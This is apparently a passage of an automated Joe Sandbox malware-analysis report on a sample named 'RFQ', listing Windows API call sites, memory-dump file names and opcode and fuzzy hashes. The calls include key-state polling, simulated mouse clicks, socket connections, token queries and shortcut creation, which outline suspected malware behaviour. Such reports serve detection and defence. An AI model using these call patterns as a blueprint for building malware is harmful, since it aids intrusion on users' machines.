                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0074B69F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                    • String ID:
• API String ID: 4210589936-0
• Opcode ID: d46d2f44789a9b659c76b1c59337ceb70fb1969a9d72fdae75abbe24765bbe87
• Instruction ID: ba2d3b9a32c3e6d545b8277f231ae953ff5fe7739e288b26d7c9b898a83dee3b
• Opcode Fuzzy Hash: d46d2f44789a9b659c76b1c59337ceb70fb1969a9d72fdae75abbe24765bbe87
• Instruction Fuzzy Hash: AF415035504115FFDF259F64C844AEABB74FB46364F104319F82A96290CB38AD54DF92
APIs
• GetWindowRect.USER32(?,?), ref: 0076B369
• PostMessageW.USER32(?,00000201,00000001), ref: 0076B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0076B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 0076B429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0076B431
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 56bdd0dd9645eb201251e19b8aee691ad78c676e102bd6e3d652fd633933b227
• Instruction ID: 0b7e119e461ae74174bc0dd8705a2647f04576eab2dd5ca12a43fa05885d5010
• Opcode Fuzzy Hash: 56bdd0dd9645eb201251e19b8aee691ad78c676e102bd6e3d652fd633933b227
• Instruction Fuzzy Hash: 2231AD71900219EBDF14CF68D949A9E3BB5EB05319F108229FC22EA2D1D7B89D54CB90
APIs
• IsWindowVisible.USER32(?), ref: 0076DBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0076DBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0076DC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0076DC52
• _wcsstr.LIBCMT ref: 0076DC5C
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 617f399857b677abfb29a0452e9547611ba4bb43e1f88a446f24ccfea0bd0a47
• Instruction ID: 0c23adbb1ffb582217fe60c403dc10cb0d596c8b47b876b53ff896347fdc1d5a
• Opcode Fuzzy Hash: 617f399857b677abfb29a0452e9547611ba4bb43e1f88a446f24ccfea0bd0a47
• Instruction Fuzzy Hash: 11210772B14244BFEB355F399C49E7B7BA8DF45750F108039FC0ACA191EAA9CC01D2A0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0076BC90
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0076BCC2
• __itow.LIBCMT ref: 0076BCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0076BD00
• __itow.LIBCMT ref: 0076BD11
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: 447e4b28598eb703436e36f9313f0e779ac927bd0418f7591b9d3c0c9a22bd20
• Instruction ID: 138c732229f437da8ff9c190b2d0efb2bb3bc596f25f93d07ee9be012bdca9a0
• Opcode Fuzzy Hash: 447e4b28598eb703436e36f9313f0e779ac927bd0418f7591b9d3c0c9a22bd20
• Instruction Fuzzy Hash: 4421C975700208BADB20AA658C49FDE7B68AF5A750F004064FD06EF182EB788D4987A1
APIs
  • Part of subcall function 007350E6: _wcsncpy.LIBCMT ref: 007350FA
• GetFileAttributesW.KERNEL32(?,?,?,?,007760C3), ref: 00776369
• GetLastError.KERNEL32(?,?,?,007760C3), ref: 00776374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007760C3), ref: 00776388
• _wcsrchr.LIBCMT ref: 007763AA
  • Part of subcall function 00776318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007760C3), ref: 007763E0
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
• Opcode ID: a98aa2cb2b540520e8cbb3e1c4e5b987d270d3e36287c247c83fd1c914588001
• Instruction ID: 7352d70dba7c6da90ab6086530c0837829bc51534cfc65f3897da2dacb5a046a
• Opcode Fuzzy Hash: a98aa2cb2b540520e8cbb3e1c4e5b987d270d3e36287c247c83fd1c914588001
• Instruction Fuzzy Hash: 2B21C631504A159BDF25AB789C46FEA23ACAF053E0F108466F449D3189EBAC9984CA55
APIs
  • Part of subcall function 0078A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0078A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00788BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00788BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00788BFE
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
• Opcode ID: 6f7c817a085b52c41dc88b13a49e5f09dbf2c041d217e3622579378a6b26a218
• Instruction ID: 5c2863adab780bbeecf74033aa6873e2004783fbd8274ba2ebdd303aa370e503
• Opcode Fuzzy Hash: 6f7c817a085b52c41dc88b13a49e5f09dbf2c041d217e3622579378a6b26a218
• Instruction Fuzzy Hash: 122190312402159FDB10AF68CC89FBE77A9EF48750F048559F916AB292DF78AC018B61
APIs
• IsWindow.USER32(00000000), ref: 00788441
• GetForegroundWindow.USER32 ref: 00788458
• GetDC.USER32(00000000), ref: 00788494
• GetPixel.GDI32(00000000,?,00000003), ref: 007884A0
• ReleaseDC.USER32(00000000,00000003), ref: 007884DB
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 010c7de7d7371f990f261909eb5a4a91b97709716bf1467a0781e0dd91c2e56b
• Instruction ID: a78aef5936ca5ccc189223fd04168f249b8458146d083971a3fe9249a82bcefd
• Opcode Fuzzy Hash: 010c7de7d7371f990f261909eb5a4a91b97709716bf1467a0781e0dd91c2e56b
• Instruction Fuzzy Hash: 88218476A00204EFD710EFA4D889B9EB7E5EF48341F04C579E859D7252DB78AD00CB60
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0074AFE3
• SelectObject.GDI32(?,00000000), ref: 0074AFF2
• BeginPath.GDI32(?), ref: 0074B009
• SelectObject.GDI32(?,00000000), ref: 0074B033
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 903c09dd0d86d5a8ebf652ea339e5802734c5dffd465755db0e867f68fccc61c
• Instruction ID: c6630ea455a8c6d5a071adc8b9af365db48b77857444b966da51f364bc27ca82
• Opcode Fuzzy Hash: 903c09dd0d86d5a8ebf652ea339e5802734c5dffd465755db0e867f68fccc61c
• Instruction Fuzzy Hash: 1E2130B0800209EFDB20DF55EC48BAA7B68B710356F54C31AE421D61A0D77D9C55DB59
                                                                                                                                                    APIs
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 007521A9
                                                                                                                                                    • CreateThread.KERNEL32(?,?,007522DF,00000000,?,?), ref: 007521ED
                                                                                                                                                    • GetLastError.KERNEL32 ref: 007521F7
                                                                                                                                                    • _free.LIBCMT ref: 00752200
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0075220B
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
• String ID:
• API String ID: 2664167353-0
• Opcode ID: 8d8e0cf9c8643e451e3398130594b0e65d8f1d04b09accc86bb5cbc36b1bbcb6
• Instruction ID: c75923dec362d86df6c80fea02a84108bf0242dc2c15877dfa0308bf6bf03596
• Opcode Fuzzy Hash: 8d8e0cf9c8643e451e3398130594b0e65d8f1d04b09accc86bb5cbc36b1bbcb6
• Instruction Fuzzy Hash: ED110877204746EF9B25AF65EC46DEB3798EF02772B100129FD1487142EBF9D80686E0
APIs
• GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0076ABD7
• GetLastError.KERNEL32(?,0076A69F,?,?,?), ref: 0076ABE1
• GetProcessHeap.KERNEL32(00000008,?,?,0076A69F,?,?,?), ref: 0076ABF0
• HeapAlloc.KERNEL32(00000000,?,0076A69F,?,?,?), ref: 0076ABF7
• GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0076AC0E
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 2a3f7ba3e8dba109bbbd62b699a50826dc0225457a99c8efde54bbdfcf8bada0
• Instruction ID: c4de1ab1d7ed31b3926487b7e9fb82147124119ca20d6ae26051e90ad2392d0e
• Opcode Fuzzy Hash: 2a3f7ba3e8dba109bbbd62b699a50826dc0225457a99c8efde54bbdfcf8bada0
• Instruction Fuzzy Hash: CA018C70200208BFDB214FA9DC48EAB3BADEF8A3947104529F806D3260EA79CC40CF74
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777A74
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00777A82
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00777A8A
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00777A94
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 06b52787b9e6031d5dea8ea472d688ad7272c82f165052bbc21e7c8e72ac1a2d
• Instruction ID: 3e61cab3a49d26fdc30b58a32b7cb9a9a50b7a4672f14a73efb21dad04f3fdc8
• Opcode Fuzzy Hash: 06b52787b9e6031d5dea8ea472d688ad7272c82f165052bbc21e7c8e72ac1a2d
• Instruction Fuzzy Hash: CF016D75C0461DDBEF14AFE8DC88ADDBB78FB08351F02C155D502B2250EB389A50C7A5
APIs
• CLSIDFromProgID.OLE32 ref: 00769ADC
• ProgIDFromCLSID.OLE32(?,00000000), ref: 00769AF7
• lstrcmpiW.KERNEL32(?,00000000), ref: 00769B05
• CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00769B15
• CLSIDFromString.OLE32(?,?), ref: 00769B21
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 58454dbc4743d8dd9eabc0a6411a0dead9f39abc5c00657257cddbec20c8adba
• Instruction ID: 199b589112fb03fb4f05193b32edbfe5a75a152879cd94fc92da1e29cb76afa9
• Opcode Fuzzy Hash: 58454dbc4743d8dd9eabc0a6411a0dead9f39abc5c00657257cddbec20c8adba
• Instruction Fuzzy Hash: 60014FB6600215FFDB214F54ED44FAA7AEDEB48762F148025FE0AD2210E778DD449BA0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0076AA79
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0076AA83
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0076AA92
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0076AA99
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0076AAAF
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 3a30901bdfc45bdd3da2ad85ece4c01c272692d1ce3c765371709568dae4dcdb
• Instruction ID: fbedf96468cf15a2ef0c1f58f8b97b13bea4e5dae878aaa70871110468e952e4
• Opcode Fuzzy Hash: 3a30901bdfc45bdd3da2ad85ece4c01c272692d1ce3c765371709568dae4dcdb
• Instruction Fuzzy Hash: E0F04F71200309BFEB215FE4AC89F773BACFF49754F00852AF942D7190EA689C41CA61
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076AADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0076AAE4
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0076AAF3
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0076AAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0076AB10
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: b9ba486140e7c736095c1c0c9a3c3a6da263bf8dce65c1b69c140242855f9f71
• Instruction ID: bb42a3472f06286aa19e529ce7c197ecc9d39db9f1369c779b432926f591f327
• Opcode Fuzzy Hash: b9ba486140e7c736095c1c0c9a3c3a6da263bf8dce65c1b69c140242855f9f71
• Instruction Fuzzy Hash: 5DF04F71200209BFEB221FA4EC88F773BAEFF45754F004129F946D7190DA689C018E61
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0076EC94
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0076ECAB
• MessageBeep.USER32(00000000), ref: 0076ECC3
• KillTimer.USER32(?,0000040A), ref: 0076ECDF
• EndDialog.USER32(?,00000001), ref: 0076ECF9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                    • Opcode ID: ff2a8d165b4112e07da417321f639a11be1db223d7cf1e89698f2cb0872b24c9
                                                                                                                                                    • Instruction ID: 681df6d8bc085164b2879f64c99e97b018c46d961ef74ff53068316adb9b8689
                                                                                                                                                    • Opcode Fuzzy Hash: ff2a8d165b4112e07da417321f639a11be1db223d7cf1e89698f2cb0872b24c9
                                                                                                                                                    • Instruction Fuzzy Hash: 47016D34500705ABEB345B10DE9EFD677B8BF00B05F044669A983A14E1EBF8AA94CB64
APIs
• EndPath.GDI32(?), ref: 0074B0BA
• StrokeAndFillPath.GDI32(?,?,007AE680,00000000,?,?,?), ref: 0074B0D6
• SelectObject.GDI32(?,00000000), ref: 0074B0E9
• DeleteObject.GDI32 ref: 0074B0FC
• StrokePath.GDI32(?), ref: 0074B117
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: ae67f7a7237acaa9acb5fed7537a67fa98aee3b3cd98ed1a04f0b4233868ec80
• Instruction ID: d3d2a40f63b6b1889a4e7bdb65f0fefba089e8846656501a9c55a04d3cc2f4ac
• Opcode Fuzzy Hash: ae67f7a7237acaa9acb5fed7537a67fa98aee3b3cd98ed1a04f0b4233868ec80
• Instruction Fuzzy Hash: 1FF0B634004249EFDB25AF69EC0DB653B65AB10362F58C315E425850F0DB3E8D66DF59
APIs
• CoInitialize.OLE32(00000000), ref: 0077F2DA
• CoCreateInstance.OLE32(007BDA7C,00000000,00000001,007BD8EC,?), ref: 0077F2F2
• CoUninitialize.OLE32 ref: 0077F555
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID: .lnk
• API String ID: 948891078-24824748
• Opcode ID: fd0a48ffa7604cdc79b27424a9498fcf42cc8f24b620b1baa179fbafc7c8a9b8
• Instruction ID: 7074a2b5f085e4b409f9ecf269d5900475100cfd5d13e3ff14841904bf3d6457
• Opcode Fuzzy Hash: fd0a48ffa7604cdc79b27424a9498fcf42cc8f24b620b1baa179fbafc7c8a9b8
• Instruction Fuzzy Hash: BBA14BB1104201AFD701EF64C889EAFB7ECEF98314F40495DF55597192EB74EA09CBA2
APIs
  • Part of subcall function 0073660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007353B1,?,?,007361FF,?,00000000,00000001,00000000), ref: 0073662F
• CoInitialize.OLE32(00000000), ref: 0077E85D
• CoCreateInstance.OLE32(007BDA7C,00000000,00000001,007BD8EC,?), ref: 0077E876
• CoUninitialize.OLE32 ref: 0077E893
  • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
  • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
• Opcode ID: e9e77ed130d35f9b6483b612766c2a2c518fc9d6cd7328500433eec9b1ab648d
• Instruction ID: 551bf52c29dca516946e897ca6f3562280b2a3c0b70ef3dd3200d166e73f080f
• Opcode Fuzzy Hash: e9e77ed130d35f9b6483b612766c2a2c518fc9d6cd7328500433eec9b1ab648d
• Instruction Fuzzy Hash: 3FA14675604301DFCB10DF14C488D6ABBE5BF89350F158998F99A9B3A2CB39EC45CB92
APIs
• __startOneArgErrorHandling.LIBCMT ref: 007532ED
  • Part of subcall function 0075E0D0: __87except.LIBCMT ref: 0075E10B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: 6f97c9dba680d58bbdfda840ad74495a826d21fdd923872777c62bc0e052469b
• Instruction ID: 75803446e7d1105476b6fe0450e42c3476a069be0eb76720e1cac8872030a797
• Opcode Fuzzy Hash: 6f97c9dba680d58bbdfda840ad74495a826d21fdd923872777c62bc0e052469b
• Instruction Fuzzy Hash: 9E517B31A08A0592CB196714C9057FA2B94AB40793F208D2CFCC5851F9EFFD8FCD9A46
APIs
• CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007CDC50,?,0000000F,0000000C,00000016,007CDC50,?), ref: 00774645
  • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
  • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
• CharUpperBuffW.USER32(?,?,00000000,?), ref: 007746C5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: BuffCharUpper$__itow__swprintf
• String ID: REMOVE$THIS
• API String ID: 3797816924-776492005
• Opcode ID: c5fe8bd7c764136adf864bc062fbf42fe9ce93c00525c8157873e8adbbaf829c
• Instruction ID: 5ec3f9c1b9a80c70ca7ea2088e988efc53345e52a987f27c6634aa7f619c4adc
• Opcode Fuzzy Hash: c5fe8bd7c764136adf864bc062fbf42fe9ce93c00525c8157873e8adbbaf829c
